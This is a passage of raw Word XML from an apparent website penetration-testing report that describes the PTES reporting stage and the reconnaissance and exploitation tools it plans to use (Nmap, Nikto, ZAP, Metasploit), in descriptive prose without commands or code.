    <w:p w14:paraId="55E579C4" w14:textId="77777777" w:rsidR="00150639" w:rsidRDefault="00FE2888" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE2888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reporting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="002C5604">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00150639" w:rsidRPr="00150639">
        <w:t>The final stage of the penetration test focuses on reporting any vulnerabilities identifie</w:t>
      </w:r>
      <w:r w:rsidR="00150639">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00150639" w:rsidRPr="00150639">
        <w:t xml:space="preserve"> within a clients/network and/or website/software application along with if they were able to be exploited along with the risk assessment </w:t>
      </w:r>
      <w:r w:rsidR="00150639">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00150639" w:rsidRPr="00150639">
        <w:t xml:space="preserve">value </w:t>
      </w:r>
      <w:r w:rsidR="00150639">
        <w:t>i.e. high, medium or low security severity if</w:t>
      </w:r>
      <w:r w:rsidR="00150639" w:rsidRPr="00150639">
        <w:t xml:space="preserve"> they were to be exploited within the future by malicious actors</w:t>
      </w:r>
      <w:r w:rsidR="00150639">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB36154" w14:textId="0719FAFC" w:rsidR="00936EBB" w:rsidRPr="002C5604" w:rsidRDefault="00150639" w:rsidP="0097658F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The report should also contain information on how to secur</w:t>
      </w:r>
      <w:r w:rsidR="005169AF">
        <w:t>ity harden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the vulnerabilities from being exploited within the future such as; configuration and/or coding changes that need to be made, software applications patches that need to be  installed along with any hardware changes that could further secure the target within the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4132" w14:textId="7B14E959" w:rsidR="00C5650F" w:rsidRPr="00167EC1" w:rsidRDefault="0062249B" w:rsidP="00167EC1">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Due to the detailed professional and systematic approach that the PTES framework provides, that is commonly utilised in industry professional ‘Black Box’ penetration testing. This framework has been chosen to be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>utilsed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> within the ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cyber Ltd’ websites security penetration testing assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9C4133" w14:textId="76AB7086" w:rsidR="00C5650F" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc40134043"/>
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00F876CA">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Penetration Testing Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2B9C4134" w14:textId="7D3D5CF0" w:rsidR="00C5650F" w:rsidRDefault="00745272" w:rsidP="00184A91">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The attacking machine</w:t>
      </w:r>
      <w:r w:rsidR="00850C8B">
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t xml:space="preserve">that was </w:t>
      </w:r>
      <w:r w:rsidR="00850C8B">
        <w:t xml:space="preserve">utilised for </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00980691">
        <w:t>penetration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00850C8B">
        <w:t>testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was a</w:t>
      </w:r>
      <w:r w:rsidR="001F1C58">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="0090297E">
        <w:t>Customised Debian Linux OS</w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t xml:space="preserve"> consisting of professional network/software penetration tools that can be found within Kali Linux and GitHub</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.3163/1536-5050.103.3.019","ISSN":"15589439","author":[{"dropping-particle":"","family":"Bouquin","given":"Daina R.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Journal of the Medical Library Association","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"GitHub","type":"article"},"uris":["http://www.mendeley.com/documents/?uuid=461a6da6-f15c-473e-9be7-320a4af99028"]}],"mendeley":{"formattedCitation":"[101]","plainTextFormattedCitation":"[101]","previouslyFormattedCitation":"[101]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B64925" w:rsidRPr="00B64925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[101]</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="001F1C58">
        <w:t xml:space="preserve"> whom</w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t xml:space="preserve"> provide customised </w:t>
      </w:r>
      <w:r w:rsidR="00184A91">
        <w:t xml:space="preserve">professional </w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t xml:space="preserve">open-source Linux penetration testing </w:t>
      </w:r>
      <w:r w:rsidR="00184A91">
        <w:t>exploits intended for known vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00843831">
        <w:t xml:space="preserve"> for researchers and security professionals</w:t>
      </w:r>
      <w:r w:rsidR="00184A91">
        <w:t xml:space="preserve"> to utilise</w:t>
      </w:r>
      <w:r w:rsidR="00071E12">
        <w:t xml:space="preserve"> created by the Linux community of </w:t>
      </w:r>
      <w:r w:rsidR="00B1376A">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="00071E12">
        <w:t>researcher</w:t>
      </w:r>
      <w:r w:rsidR="00184A91">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE5C44A" w14:textId="14C362D7" w:rsidR="00EF3A0A" w:rsidRDefault="0090297E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information </w:t>
      </w:r>
      <w:r w:rsidR="00EF3A0A" w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>athering</w:t>
      </w:r>
      <w:r w:rsidR="005A083A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reconnaissance)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF3A0A" w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ools;</w:t>
      </w:r>
      <w:r w:rsidR="00EF655B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF655B" w:rsidRPr="00EF655B">
        <w:t>The tools that will be utilised during this stage of the penetration test are as follows</w:t>
      </w:r>
      <w:r w:rsidR="00EF655B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BC56D4" w14:textId="078EEBAD" w:rsidR="00EF655B" w:rsidRDefault="00D82B77" w:rsidP="00D82B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006031A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap: -</w:t>
      </w:r>
      <w:r w:rsidR="006031A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D82B77">
        <w:t>This powerful popular</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux based</w:t>
      </w:r>
      <w:r w:rsidRPr="00D82B77">
        <w:t xml:space="preserve"> industry tool is CLI based that focuses on fingerprinting a network and/or target to reveille, IP addresses being utilised on the network along with their exposed ports, OS and services that are being utilsed by the system</w:t>
      </w:r>
      <w:r w:rsidR="00C829C2">
        <w:t xml:space="preserve"> that could be vulnerable to attack</w:t>
      </w:r>
      <w:r w:rsidRPr="00D82B77">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AE2A47">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1201/b16797-6","abstract":"This article describes the development of NMAP, the UK academic gateway to high-quality Internet resources for Nurses, Midwives and Allied health Professionals. The service is described and the rationale for NMAP summarized, focusing on the increasing use of Internet resources in nursing education and practice. International concerns over the quality of health information available on the Internet are considered, and the approach adopted by NMAP to quality filtering described. The usage data and results of evaluation studies show the need for this type of Internet gateway, and some of the lessons may be relevant to others involved in developing national high-quality Internet gateways for nurses.","author":[{"dropping-particle":"","family":"Middleton","given":"Bruce","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Conducting Network Penetration and Espionage in a Global Environment","id":"ITEM-1","issued":{"date-parts":[["2014"]]},"title":"Nmap","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=ffe09157-d719-4c78-9eb2-4e5bf4f66032"]},{"id":"ITEM-2","itemData":{"DOI":"10.1073/pnas.0804042105","ISBN":"0027-8424","abstract":"Nmap Free Security Scanner, Port Scanner, {&amp;} Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.","author":[{"dropping-particle":"","family":"Lyon","given":"Gordon","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"https://nmap.org/","id":"ITEM-2","issued":{"date-parts":[["2017"]]},"title":"Nmap: the Network Mapper - Free Security Scanner","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=b21ceca6-e1cd-467c-8f12-8d769d9fa2ed"]}],"mendeley":{"formattedCitation":"[102], [103]","plainTextFormattedCitation":"[102], [103]","previouslyFormattedCitation":"[102], [103]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B64925" w:rsidRPr="00B64925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[102], [103]</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C3F3A" w14:textId="77777777" w:rsidR="0063079F" w:rsidRPr="006031A9" w:rsidRDefault="0063079F" w:rsidP="0063079F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F04E13" w14:textId="7B245147" w:rsidR="0063079F" w:rsidRDefault="00D82B77" w:rsidP="00D82B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006031A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006031A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: -</w:t>
      </w:r>
      <w:r w:rsidRPr="00D82B77">
        <w:t>This powerful automated CLI Linux based industry standard tool</w:t>
      </w:r>
      <w:r w:rsidR="00D32520">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D82B77">
        <w:t>is utilised for website vulnerability scanning and assessment of a given target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to provide information to security penetration testers about potential unsecure hidden directories, coding and configuration errors within a website that could be potentially exploited.</w:t>
      </w:r>
      <w:r w:rsidR="00D32520" w:rsidRPr="00D32520">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D32520">
        <w:t xml:space="preserve">This tool contains a multitude of </w:t>
      </w:r>
      <w:r w:rsidR="00E476F9">
        <w:t xml:space="preserve">plugins that are utilised to perform the automated website vulnerability assessment. A very popular plugin within </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E476F9">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E476F9">
        <w:t xml:space="preserve"> is the WordPress fingerprint scanner plugin</w:t>
      </w:r>
      <w:r w:rsidR="00D32520">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E476F9">
        <w:t>due to the vast number of modern websites that are created using the WordPress application.</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.","author":[{"dropping-particle":"","family":"Sullo","given":"Chris","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Lodge","given":"David","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"CIRT.net","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"Nikto2","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=892c8b08-947c-41d3-aecf-46045736fef8"]},{"id":"ITEM-2","itemData":{"DOI":"10.1016/b978-1-59749-655-1.00005-2","abstract":"One of the first tools that should be used to evaluate the service after running a port scan and discovering a service running on port 80 or port 443 is Nikto. Nikto is a web server vulnerability scanner that automates the process of scanning web servers for out-of-date and unpatched software as well as searching for dangerous files that may reside on web servers. Nikto is capable of identifying a wide range of specific issues and also checks the server for configuration issues. The current version of Nikto is built into Backtrack and available in the pentest/scanners/nikto directory. Another tool to use when first interacting with a target web server is Websecurify. Websecurify provides an easy-to-use interface that allows penetration testers to quickly and easily identify web vulnerabilities including SQL injection, cross-site scripting, file includes, and cross-site request forgery. Websecurify can be set up and used with little configuration making it very friendly for the people who are new to web penetration testing. Another tool to use when initially interacting with a web target is WebScarab. If one is running Backtrack, a version of WebScarab is already installed. This powerful framework is modular in nature and allows loading numerous plug-ins to customize it to the needs. Even in its default configuration, WebScarab provides an excellent resource for interacting with and interrogating web targets.","author":[{"dropping-particle":"","family":"Engebretson","given":"Patrick","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"The Basics of Hacking and Penetration Testing","id":"ITEM-2","issued":{"date-parts":[["2011"]]},"title":"Web-Based Exploitation","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=a484442d-6ac7-4557-b8fc-25c620f36507"]}],"mendeley":{"formattedCitation":"[104], [105]","plainTextFormattedCitation":"[104], [105]","previouslyFormattedCitation":"[104], [105]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B64925" w:rsidRPr="00B64925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[104], [105]</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="138E225A" w14:textId="77777777" w:rsidR="0063079F" w:rsidRPr="0063079F" w:rsidRDefault="0063079F" w:rsidP="0063079F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3CB8E5" w14:textId="77777777" w:rsidR="0063079F" w:rsidRPr="0063079F" w:rsidRDefault="0063079F" w:rsidP="0063079F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4542195F" w14:textId="0CA0B1B5" w:rsidR="00EF655B" w:rsidRDefault="00D82B77" w:rsidP="00685DD3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006031A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Zap: -</w:t>
      </w:r>
      <w:r w:rsidR="00DF6511">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF6511" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve">This tool is </w:t>
      </w:r>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve">a Linux </w:t>
      </w:r>
      <w:r w:rsidR="00DF6511" w:rsidRPr="009D66CF">
        <w:t>GUI based</w:t>
      </w:r>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
      <w:r w:rsidR="00DF6511" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:t xml:space="preserve">created by OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00DF6511" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve">that also focuses on website </w:t>
      </w:r>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00DF6511" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve"> scanning of a given target</w:t>
      </w:r>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve"> similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve"> that will also be utilsed as a secondary vulnerability assessment tool in addition to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve"> to highlight any website vulnerabilities that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t xml:space="preserve"> may not find</w:t>
      </w:r>
      <w:r w:rsidR="00685DD3">
        <w:t xml:space="preserve"> with the default vulnerability plugins it utilises</w:t>
      </w:r>
      <w:r w:rsidR="009D66CF" w:rsidRPr="009D66CF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.","author":[{"dropping-particle":"","family":"OWASP","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"OWASP Zed Attack Proxy Project","id":"ITEM-1","issued":{"date-parts":[["2016"]]},"title":"OWASP Zed Attack Proxy Project","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=700ea5bd-6b9f-460a-b803-6c5c8a91992d"]}],"mendeley":{"formattedCitation":"[106]","plainTextFormattedCitation":"[106]","previouslyFormattedCitation":"[106]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B64925" w:rsidRPr="00B64925">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[106]</w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D82E152" w14:textId="2F515860" w:rsidR="006031A9" w:rsidRDefault="006031A9" w:rsidP="006031A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note; No information will be gathered </w:t>
      </w:r>
      <w:r w:rsidR="00BB5530">
        <w:t>about the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> staff/clients with </w:t>
      </w:r>
      <w:r w:rsidR="00BB5530">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>use of phishing E-Mails or malware with accordance to the contingency policy outlined previously in this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EB7737" w14:textId="3FF0403B" w:rsidR="00EF3A0A" w:rsidRDefault="0090297E" w:rsidP="00426938">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation </w:t>
      </w:r>
      <w:r w:rsidR="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ools</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="00053D38">
        <w:t>The tools that will be utilised during this stage of the penetration test are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763F5D03" w14:textId="568D3566" w:rsidR="007A7AAF" w:rsidRPr="00367CE3" w:rsidRDefault="007A7AAF" w:rsidP="00426938">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7AAF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00426938">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (MSF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: - </w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t>This Linux</w:t>
      </w:r>
      <w:r w:rsidR="005D506B">
        <w:t xml:space="preserve"> CLI</w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00575248">
        <w:t xml:space="preserve">professional industry standard </w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t xml:space="preserve">open-source exploitation framework created and </w:t>
      </w:r>
      <w:r w:rsidR="00367CE3" w:rsidRPr="00367CE3">
        <w:t>maintained</w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t>Rapid7</w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t>ecurity</w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t xml:space="preserve"> is considered the most </w:t>
      </w:r>
      <w:r w:rsidR="00367CE3" w:rsidRPr="00367CE3">
        <w:t>powerful</w:t>
      </w:r>
      <w:r w:rsidR="00426938" w:rsidRPr="00367CE3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00367CE3" w:rsidRPr="00367CE3">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00575248">
        <w:t>efficient</w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:t xml:space="preserve"> framework that consists of </w:t>
      </w:r>
      <w:r w:rsidR="00575248">
        <w:t xml:space="preserve">a collection of </w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:t>over 2000 exploitation modules (tools)</w:t>
      </w:r>
      <w:r w:rsidR="00575248">
        <w:t xml:space="preserve"> written in ‘Ruby’ scripting language that cater</w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:t xml:space="preserve"> for a vast majority of known network/systems and application vulnerabilities that can be utilised within any penetration testing environment such as: LAN systems, Mobile Device, Website, Application and many more penetration testing </w:t>
      </w:r>
      <w:r w:rsidR="00575248">
        <w:t>settings</w:t>
      </w:r>
      <w:r w:rsidR="00367CE3">
        <w:t>. MSF is regularly updated to include the latest exploits to newly found vulnerabilities by research professionals within ‘Rapid7 Security’ and independent researchers around the globe.</w:t>
      </w:r>
      <w:r w:rsidR="00575248">
        <w:t xml:space="preserve"> Rapid7 offer a premium version of MSF that contains more powerful exploits to vulnerabilities that have not been released to the general public, this version of MSF that is often utilised by large cybersecurity </w:t>
      </w:r>
      <w:r w:rsidR="00B64925">
        <w:t>companies</w:t>
      </w:r>
      <w:r w:rsidR="00575248">
